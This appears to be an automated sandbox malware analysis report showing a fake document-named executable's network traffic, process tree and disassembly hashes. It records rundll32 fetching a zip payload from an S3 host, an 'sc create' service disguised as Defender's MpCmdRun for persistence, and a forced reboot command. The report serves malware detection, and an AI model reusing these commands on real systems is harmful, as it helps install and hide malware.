                                                                            Jan 30, 2024 13:32:43.484270096 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.484338999 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.484385014 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.484400988 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.484409094 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.484436035 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.484455109 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:44.644974947 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:44.644994974 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:44.645019054 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:44.645046949 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:44.645067930 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:44.645097017 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:44.645261049 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:44.873152971 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:44.873259068 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:44.873286963 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:44.873452902 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:44.873452902 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:44.873536110 CET49735443192.168.2.452.95.163.114
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 30, 2024 13:32:39.865561962 CET | 52861 | 53 | 192.168.2.4 | 1.1.1.1
Jan 30, 2024 13:32:40.005392075 CET | 53 | 52861 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 30, 2024 13:32:39.865561962 CET | 192.168.2.4 | 1.1.1.1 | 0x54a0 | Standard query (0) | b38709202.s3.sa-east-1.amazonaws.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 30, 2024 13:32:40.005392075 CET | 1.1.1.1 | 192.168.2.4 | 0x54a0 | No error (0) | b38709202.s3.sa-east-1.amazonaws.com | s3-r-w.sa-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 30, 2024 13:32:40.005392075 CET | 1.1.1.1 | 192.168.2.4 | 0x54a0 | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 52.95.163.114 | A (IP address) | IN (0x0001) | false
Jan 30, 2024 13:32:40.005392075 CET | 1.1.1.1 | 192.168.2.4 | 0x54a0 | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 3.5.232.102 | A (IP address) | IN (0x0001) | false
Jan 30, 2024 13:32:40.005392075 CET | 1.1.1.1 | 192.168.2.4 | 0x54a0 | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 16.12.0.94 | A (IP address) | IN (0x0001) | false
Jan 30, 2024 13:32:40.005392075 CET | 1.1.1.1 | 192.168.2.4 | 0x54a0 | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 16.12.2.14 | A (IP address) | IN (0x0001) | false
Jan 30, 2024 13:32:40.005392075 CET | 1.1.1.1 | 192.168.2.4 | 0x54a0 | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 52.95.163.11 | A (IP address) | IN (0x0001) | false
Jan 30, 2024 13:32:40.005392075 CET | 1.1.1.1 | 192.168.2.4 | 0x54a0 | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 52.95.164.35 | A (IP address) | IN (0x0001) | false
Jan 30, 2024 13:32:40.005392075 CET | 1.1.1.1 | 192.168.2.4 | 0x54a0 | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 16.12.1.90 | A (IP address) | IN (0x0001) | false
Jan 30, 2024 13:32:40.005392075 CET | 1.1.1.1 | 192.168.2.4 | 0x54a0 | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 52.95.164.122 | A (IP address) | IN (0x0001) | false
                                                                            • b38709202.s3.sa-east-1.amazonaws.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49735 | 52.95.163.114 | 443 | 7516 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-01-30 12:32:40 UTC | 307 | OUT | GET /falseSc.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: b38709202.s3.sa-east-1.amazonaws.com
Connection: Keep-Alive
2024-01-30 12:32:41 UTC | 423 | IN | HTTP/1.1 200 OK
x-amz-id-2: bZmaScVS0jlVw0xyt8qTSWXyM5hFTLiX7b4sLdaT7df8kx1NfJekU4TUXuo9IP/MpEqeVuX/P90=
x-amz-request-id: QFTT040247AHFASH
Date: Tue, 30 Jan 2024 12:32:41 GMT
Last-Modified: Sun, 28 Jan 2024 00:29:55 GMT
ETag: "51b2093e0b5ed5e5222783d1e118f078"
x-amz-server-side-encryption: AES256
Accept-Ranges: bytes
Content-Type: application/zip
Server: AmazonS3
Content-Length: 8773630
Connection: close



                                                                            Target ID:0
                                                                            Start time:13:32:21
                                                                            Start date:30/01/2024
                                                                            Path:C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exe
                                                                            Imagebase:0x2b0000
                                                                            File size:30'540'800 bytes
                                                                            MD5 hash:511FDCC7FC2F4220353004CFB011F522
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:1
                                                                            Start time:13:32:21
                                                                            Start date:30/01/2024
                                                                            Path:C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exe" --rerunningWithoutUAC
                                                                            Imagebase:0x2b0000
                                                                            File size:30'540'800 bytes
                                                                            MD5 hash:511FDCC7FC2F4220353004CFB011F522
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:2
                                                                            Start time:13:32:22
                                                                            Start date:30/01/2024
                                                                            Path:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:1'899'520 bytes
                                                                            MD5 hash:A560BAD9E373EA5223792D60BEDE2B13
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, Author: Joe Security
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:3
                                                                            Start time:13:32:26
                                                                            Start date:30/01/2024
                                                                            Path:C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exe" --squirrel-firstrun
                                                                            Imagebase:0x2af0b450000
                                                                            File size:359'424 bytes
                                                                            MD5 hash:A8AEC0D17F15C613DCCAD945FCF6F928
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:4
                                                                            Start time:13:32:26
                                                                            Start date:30/01/2024
                                                                            Path:C:\Windows\System32\svchost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                            Imagebase:0x7ff6eef20000
                                                                            File size:55'320 bytes
                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:6
                                                                            Start time:13:32:32
                                                                            Start date:30/01/2024
                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" Tower2
                                                                            Imagebase:0x7ff704ce0000
                                                                            File size:71'680 bytes
                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:7
                                                                            Start time:13:32:32
                                                                            Start date:30/01/2024
                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" Tower2
                                                                            Imagebase:0x580000
                                                                            File size:61'440 bytes
                                                                            MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:Borland Delphi
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:10
                                                                            Start time:13:32:37
                                                                            Start date:30/01/2024
                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" Tower
                                                                            Imagebase:0x7ff704ce0000
                                                                            File size:71'680 bytes
                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:11
                                                                            Start time:13:32:38
                                                                            Start date:30/01/2024
                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" Tower
                                                                            Imagebase:0x580000
                                                                            File size:61'440 bytes
                                                                            MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:Borland Delphi
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:14
                                                                            Start time:13:32:46
                                                                            Start date:30/01/2024
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto
                                                                            Imagebase:0x240000
                                                                            File size:236'544 bytes
                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:15
                                                                            Start time:13:32:46
                                                                            Start date:30/01/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:16
                                                                            Start time:13:32:46
                                                                            Start date:30/01/2024
                                                                            Path:C:\Windows\SysWOW64\sc.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto
                                                                            Imagebase:0x1d0000
                                                                            File size:61'440 bytes
                                                                            MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:19
                                                                            Start time:13:32:55
                                                                            Start date:30/01/2024
                                                                            Path:C:\Windows\SysWOW64\shutdown.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\WINDOWS\system32\shutdown.exe -r -t 1 -f
                                                                            Imagebase:0x790000
                                                                            File size:23'552 bytes
                                                                            MD5 hash:FCDE5AF99B82AE6137FB90C7571D40C3
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:20
                                                                            Start time:13:32:55
                                                                            Start date:30/01/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true


                                                                              Execution Graph

                                                                              Execution Coverage:10.8%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:6.7%
                                                                              Total number of Nodes:75
                                                                              Total number of Limit Nodes:1

                                                                              Callgraph

                                                                              Control-flow Graph

                                                                              control_flow_graph 15 2b9cdb-2b9ce0 call 2ba090 18 2b9c9b-2b9c9c 15->18 18->15
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 002B9C96
                                                                                • Part of subcall function 002BA090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 002BA09B
                                                                                • Part of subcall function 002BA090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002BA103
                                                                                • Part of subcall function 002BA090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002BA114
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1641302260.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1641283427.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1641328071.00000000002CF000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1641345526.00000000002DA000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1641386482.00000000002DC000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1641386482.0000000000CDC000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1641386482.00000000016DC000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2b0000_WKYC506_2389030007-00901003007010_777380775_#U00b2.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                              • String ID:
                                                                              • API String ID: 697777088-0
                                                                              • Opcode ID: d719fa9c5987a24306b5b252d3757c6ee41096cca9b294c5e0680324264ef6cc
                                                                              • Instruction ID: a7fd822035c684f8b221e79e1defeca5ab8f0cab2bfa28b5657e7e1b4f485808
                                                                              • Opcode Fuzzy Hash: d719fa9c5987a24306b5b252d3757c6ee41096cca9b294c5e0680324264ef6cc
                                                                              • Instruction Fuzzy Hash: 82B0128137C1007D3114B3181C02E76064CE0D4B603304C2BF100C5280D8801CB00033
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              control_flow_graph 5 2b9cbd-2b9cc2 6 2b9c8e-2b9c96 call 2ba090 5->6 8 2b9c9b-2b9ce0 6->8 8->6
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 002B9C96
                                                                                • Part of subcall function 002BA090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 002BA09B
                                                                                • Part of subcall function 002BA090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002BA103
                                                                                • Part of subcall function 002BA090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002BA114
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1641302260.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1641283427.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1641328071.00000000002CF000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1641345526.00000000002DA000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1641386482.00000000002DC000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1641386482.0000000000CDC000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1641386482.00000000016DC000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2b0000_WKYC506_2389030007-00901003007010_777380775_#U00b2.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                              • String ID:
                                                                              • API String ID: 697777088-0
                                                                              • Opcode ID: dc9a7d3f221735f24422a515ff1f0fbd6d5ba2e7fea112c21d8bac71bce6e305
                                                                              • Instruction ID: fa0af724d3d8e0536b0895b28ba930839749ae202f5e9d69c9444825df8e7cb2
                                                                              • Opcode Fuzzy Hash: dc9a7d3f221735f24422a515ff1f0fbd6d5ba2e7fea112c21d8bac71bce6e305
                                                                              • Instruction Fuzzy Hash: 48B0128227C1007D3104B3181C02F76168CE0C4F603308C2BF100C5240D8801C700033
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              control_flow_graph 0 2b9cb3-2b9cb8 1 2b9c8e-2b9c96 call 2ba090 0->1 3 2b9c9b-2b9ce0 1->3 3->1
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 002B9C96
                                                                                • Part of subcall function 002BA090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 002BA09B
                                                                                • Part of subcall function 002BA090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002BA103
                                                                                • Part of subcall function 002BA090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002BA114
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1641302260.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1641283427.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1641328071.00000000002CF000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1641345526.00000000002DA000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1641386482.00000000002DC000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1641386482.0000000000CDC000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1641386482.00000000016DC000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2b0000_WKYC506_2389030007-00901003007010_777380775_#U00b2.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                              • String ID:
                                                                              • API String ID: 697777088-0
                                                                              • Opcode ID: bd070a22f5c723d186d6f642e9eb1043db89febe2c25b70c1dad145d42450918
                                                                              • Instruction ID: bf3d1ccab3266b1c28dca78a67bf25d4e74bce46184f01c53a903ee5af7eb9d4
                                                                              • Opcode Fuzzy Hash: bd070a22f5c723d186d6f642e9eb1043db89febe2c25b70c1dad145d42450918
                                                                              • Instruction Fuzzy Hash: 8FB0128127C1007D3104B3281C02E76168CD1C4F60330CC2BF500C5240D9801C700033
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              control_flow_graph 10 2b9cd1-2b9cd6 11 2b9c8e-2b9c96 call 2ba090 10->11 13 2b9c9b-2b9ce0 11->13 13->11
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 002B9C96
                                                                                • Part of subcall function 002BA090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 002BA09B
                                                                                • Part of subcall function 002BA090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002BA103
                                                                                • Part of subcall function 002BA090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002BA114
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1641302260.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1641283427.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1641328071.00000000002CF000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1641345526.00000000002DA000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1641386482.00000000002DC000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1641386482.0000000000CDC000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1641386482.00000000016DC000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2b0000_WKYC506_2389030007-00901003007010_777380775_#U00b2.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                              • String ID:
                                                                              • API String ID: 697777088-0
                                                                              • Opcode ID: 1cf5762cc67cabbd56af4eff0bf6d45f0a564c214f5715767279d5b46071e8ce
                                                                              • Instruction ID: cfd279bd12850a44f165f362059e408d847217a17d777b6c09693913f2b90297
                                                                              • Opcode Fuzzy Hash: 1cf5762cc67cabbd56af4eff0bf6d45f0a564c214f5715767279d5b46071e8ce
                                                                              • Instruction Fuzzy Hash: 85B012C137C1007D3114B3185E02E76064CE0D4B60330482BF100C5244D8801CB10033
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1703218576.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ffd9b8e0000_Update.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: rT_H$wT_H
                                                                              • API String ID: 0-865995818
                                                                              • Opcode ID: 4305d5646361c91d00b6ea952ca13795c38022331dad0714efcb6a97453e5697
                                                                              • Instruction ID: d587153655d9be69c5b8e427964b0243c603ad6da1071dd0cd8c0216d55bce6c
                                                                              • Opcode Fuzzy Hash: 4305d5646361c91d00b6ea952ca13795c38022331dad0714efcb6a97453e5697
                                                                              • Instruction Fuzzy Hash: B3423B31B1D90E4BE76CABAC98666B973D1EF99310F15027AD45EC32E6ED297C034381
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1703218576.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ffd9b8e0000_Update.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 3N_^$4N_^
                                                                              • API String ID: 0-2923934511
                                                                              • Opcode ID: f893e3f9aaef4f6a8f0c8b565e2e7a1106f498c03053f713f8054de09af50f96
                                                                              • Instruction ID: 5c179e7976f2495522c012ea83fc75d2bbf11afefd32f0a114f77b725b956994
                                                                              • Opcode Fuzzy Hash: f893e3f9aaef4f6a8f0c8b565e2e7a1106f498c03053f713f8054de09af50f96
                                                                              • Instruction Fuzzy Hash: 31C11867B0E2A60BDB15B7BCBCB65E57BA0DF0133E75A41B3D1DDCA097EC0864468284
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1703218576.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ffd9b8e0000_Update.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: k/
                                                                              • API String ID: 0-3387497385
                                                                              • Opcode ID: 9bcafa503e0abb95220b786e21b5b7c016f5826505a1a1fb7652ed0c0b4a0bb9
                                                                              • Instruction ID: 11ae1638ee4e859fab34ef0e32a0078aeb8014dd4d96e74d9b76153aa90760e1
                                                                              • Opcode Fuzzy Hash: 9bcafa503e0abb95220b786e21b5b7c016f5826505a1a1fb7652ed0c0b4a0bb9
                                                                              • Instruction Fuzzy Hash: AE82C174A28B098FD768DF18C491671B7E1FB98314B14466EC4DBC7AA2DA35F843CB81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1703218576.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ffd9b8e0000_Update.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bd33aec5f6ef71e4838bf8a9655e46ca6f4971a3fb8a74c5394c67db50fd2435
                                                                              • Instruction ID: d3fdd5d565102dc487b0185e2940447fc4fac9b14163cce145b789870aa643d1
                                                                              • Opcode Fuzzy Hash: bd33aec5f6ef71e4838bf8a9655e46ca6f4971a3fb8a74c5394c67db50fd2435
                                                                              • Instruction Fuzzy Hash: 39122831B1D90A4FE79CEB6C94A5A7973D2EF98310F4501B9E45EC72E6DE29EC028341
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1703218576.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ffd9b8e0000_Update.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: M_^X$M_^f$M_^h
                                                                              • API String ID: 0-194087038
                                                                              • Opcode ID: 0303ac75017610b6da233370906245067a02e6197d266422ab0d1a0030ff334b
                                                                              • Instruction ID: 87005c1c330c1c3c318f158f3f8de9b1800e19b281332cd48dc8bdf0ea859ad8
                                                                              • Opcode Fuzzy Hash: 0303ac75017610b6da233370906245067a02e6197d266422ab0d1a0030ff334b
                                                                              • Instruction Fuzzy Hash: 1E516F62F1E29A4FD726A7B85C664E87BA0EF45320F1501FED45CCB1E3E91C5906C382
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1703218576.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ffd9b8e0000_Update.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: H$M_^
                                                                              • API String ID: 0-4152858768
                                                                              • Opcode ID: a09a255f92646a0a3e2679da1284225a06f6c666a8538bf19a4fb1d87e61c3f9
                                                                              • Instruction ID: e485ac5965c29997d7075f67354ec676cb6b1110ce40429277101106b70c5f81
                                                                              • Opcode Fuzzy Hash: a09a255f92646a0a3e2679da1284225a06f6c666a8538bf19a4fb1d87e61c3f9
                                                                              • Instruction Fuzzy Hash: 35E14A93F0F94E0BE769B7ACA8664F93B90DF99235B0502B7D05DC71E3EC1869068391
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1703218576.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ffd9b8e0000_Update.jbxd
                                                                              Similarity
                                                                              • API ID:
